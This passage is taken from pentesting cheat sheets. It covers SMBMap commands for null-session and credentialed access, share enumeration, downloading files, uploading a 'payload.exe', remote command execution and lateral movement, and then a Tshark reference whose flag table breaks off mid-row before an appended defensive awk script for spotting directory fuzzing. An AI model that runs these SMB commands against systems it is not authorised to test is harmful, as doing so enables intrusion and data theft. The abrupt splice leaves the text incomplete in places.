| `--users` | Enumerate users |
| `--admin` | Check if user has admin access |
| `-v` | Verbose output |

---

## **3. Practical Examples**

### **Authentication**
**Null Session (Guest Access):**
```bash
smbmap -u '' -p '' -d . -H 192.168.1.1
```

**Authenticated Access:**
```bash
smbmap -u admin -p 'Password123!' -d WORKGROUP -H 192.168.1.1
```

---

### **Share Enumeration**
**List All Shares:**
```bash
smbmap -H 192.168.1.1
```

**Check Specific Share:**
```bash
smbmap -H 192.168.1.1 -s 'C$'
```

**Check Shares with Full Permissions:**
```bash
smbmap -H 192.168.1.1 -R
```

---

### **File Operations**
**Download a File:**
```bash
smbmap -u admin -p 'Password123!' -H 192.168.1.1 --download 'C$\secret.txt'
```

**Upload a File:**
```bash
smbmap -u admin -p 'Password123!' -H 192.168.1.1 --upload '/tmp/payload.exe' 'C$\Windows\Temp\payload.exe'
```

**Recursive Directory Listing:**
```bash
smbmap -u guest -p '' -H 192.168.1.1 -R 'Documents'
```

---

### **Command Execution**
**Run a Command (e.g., `whoami`):**
```bash
smbmap -u admin -p 'Password123!' -H 192.168.1.1 -x 'whoami'
```

**Execute a PowerShell Script:**
```bash
smbmap -u admin -p 'Password123!' -H 192.168.1.1 -x 'powershell -c "Get-Process"'
```

---

### **User & Permission Checks**
**Enumerate Users:**
```bash
smbmap -H 192.168.1.1 --users
```

**Check Admin Access:**
```bash
smbmap -u admin -p 'Password123!' -H 192.168.1.1 --admin
```

---

## **4. Advanced Techniques**

### **Port Redirection**
Target non-standard SMB port (e.g., 8445):
```bash
smbmap -H 192.168.1.1 -P 8445
```

### **Read-Only Checks**
Check if shares are writable:
```bash
smbmap -u guest -p '' -H 192.168.1.1 --no-write-check
```

### **Brute-Force Share Names**
Combine with `enum4linux` or `nmap` scripts for share discovery.

---

## **5. Useful Tips**
- Use `-v` for debugging connection issues.
- Combine with `crackmapexec` for lateral movement.
- For interactive sessions, use `smbclient` (e.g., `smbclient //192.168.1.1/C$ -U admin`).
- Always check permissions (`--admin`, `-R`) before attempting writes.

---
## **6. References**
- [SMBMap GitHub](https://github.com/ShawnDEvans/smbmap)
--------------------------------------------------------------------------------
/Tshark_CheatSheet.md:
--------------------------------------------------------------------------------
# Tshark Cheat Sheet
*Command-Line Network Protocol Analyzer*

---

## Overview

- **Tshark**: A tool for capturing and analyzing network traffic via the command line.
- **Capture Filters**: (BPF syntax) Applied during capture to limit the data saved.
- **Display Filters**: (Wireshark filtering language) Applied when reading a capture file.
- **Use Cases**: Live monitoring, offline analysis, protocol troubleshooting, and generating statistics.

---

## Installation

### Ubuntu/Debian
```bash
sudo apt-get install tshark
```

### Arch Linux
```bash
sudo pacman -S tshark
```

---

## Common Flags and Options

| **Flag** | **Description** | **Example** |
|---|---|---|
| `-i <interface>` | Specify the network interface (e.g., `eth0`, `wlan0`) to capture packets from. | `sudo tshark -i eth0` |
| `-w <file>` | Write captured packets to a file in PCAP format. | `sudo tshark -i eth0 -w capture.pcap` |
| `-r <file>` | Read packets from a saved capture file. | `tshark -r capture.pcap` |
| `-f "<filter>"` | Apply a capture filter (BPF syntax) during capture. | `sudo tshark -i eth0 -f "tcp port 80"` |
| `-Y "<filter>"` | Apply a display filter to show specific packets from a capture file. | `tshark -r capture.pcap -Y "http"` |
| `-T <format>` | Specify output format (e.g., `fields`, `json`, `pdml`, `text`). | `tshark -r capture.pcap -T json` |
| `-e <field>` | Print a specific field in the output (used with `-T fields`). | `-e http.request.method` |
| `-V` | Enable verbose output for detailed packet information. | `sudo tshark -i eth0 -V` |
| `-c <count>` | Stop capture after a fixed number of packets. | `sudo tshark -i eth0 -c 100` |
| `-n` | Disable name resolution for faster capture and output (IP addresses remain numeric). | `sudo tshark -i eth0 -n` |
| `-q` | Quiet mode: minimal output, useful when combined with statistics or follow options. | `tshark -r capture.pcap -qz conv,ip` |
| `-b
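The `-T fields` / `-e` combination in the table above turns a capture into tab-separated lines, one per packet, which is the form most amenable to scripting. The block below is an added example, not part of the cheat sheet: a POSIX `sh`/`awk` summary over the output of `tshark -r capture.pcap -Y http.request -T fields -e ip.src -e http.request.method -e http.request.uri` (a real invocation; `http.request`, `ip.src`, `http.request.method` and `http.request.uri` are standard Wireshark field names). It counts requests and distinct URIs per client, the quick way to spot a source walking a wordlist of paths. The function name `http_request_summary` and the sample lines (documentation-range addresses) are constructed for this example.

```shell
#!/bin/sh
# Added example, not part of the cheat sheet: post-process `tshark -T fields` output.
# Input is what this invocation prints, one tab-separated line per HTTP request:
#   tshark -r capture.pcap -Y http.request -T fields -e ip.src -e http.request.method -e http.request.uri
# The summary counts requests and distinct URIs per client; a source hitting many
# distinct paths in a short capture is the usual footprint of directory fuzzing.

http_request_summary() {
    awk -F'\t' '
        NF >= 3 && $1 != "" {
            count[$1]++
            if (!seen[$1, $3]++) distinct[$1]++   # count each URI once per source
        }
        END {
            for (src in count)
                printf "%s requests=%d distinct_uris=%d\n", src, count[src], distinct[src]
        }' | sort
}

# Constructed sample output (documentation-range IPs), tab-separated as tshark emits it.
FIELDS=$(printf '198.51.100.20\tGET\t/index.html
198.51.100.20\tGET\t/about.html
203.0.113.9\tGET\t/admin
203.0.113.9\tGET\t/backup
203.0.113.9\tGET\t/config
203.0.113.9\tGET\t/index.html
203.0.113.9\tPOST\t/admin')

printf '%s\n' "$FIELDS" | http_request_summary
```

Feeding a real capture is a one-liner (`tshark -r capture.pcap -Y http.request -T fields -e ip.src -e http.request.method -e http.request.uri | http_request_summary`); adding `-e http.response.code` to a second pass over `http.response` packets lets you separate a browsing client from one collecting 404s, which is the distinction that matters for an alert.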